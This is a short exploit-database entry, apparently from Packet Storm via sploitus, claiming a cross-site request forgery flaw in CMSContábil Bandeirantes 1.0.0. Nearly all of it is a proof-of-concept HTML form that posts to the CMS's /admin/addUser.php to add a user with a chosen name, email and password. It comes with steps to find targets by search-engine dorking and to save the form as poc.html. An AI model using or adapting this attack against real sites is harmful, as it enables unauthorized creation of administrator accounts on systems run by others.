Share
## https://sploitus.com/exploit?id=PACKETSTORM:173677
======================================================================================================================================
| # Title : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |
| # Vendor : https://scriptmafia.org/ |
======================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] Go to the line 12.
[+] Set the target site link Save changes and apply .
[+] infected file : /admin/addUser.php
[+] Save code as poc.html
<section id="main" class="column" style="height: 680px;">
<h4 class="alert_info">Necessário preencher todos os campos.</h4>
<!--<h4 class="alert_warning">A Warning Alert</h4>
<h4 class="alert_error">An Error Message</h4>
<h4 class="alert_success">A Success Message</h4>-->
<article class="module width_full">
<form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">
<header><h3>Adicionar Usuários</h3></header>
<div class="module_content">
<fieldset>
<label>Nome</label>
<input name="nome" id="nome" value="" type="text">
</fieldset>
<fieldset>
<label>Email</label>
<input name="email" id="email" value="" type="text">
</fieldset>
<fieldset>
<label>Senha</label>
<input name="senha" id="senha" value="" type="text">
</fieldset>
<div class="clear"></div>
</div>
<footer>
<div class="submit_link">
<input id="limpar" name="limpar" value="limpar" type="submit">
<input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">
</div>
</footer>
</form>
</article><!-- end of post new article -->
<div class="spacer"></div>
</section>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |
=======================================================================================================================================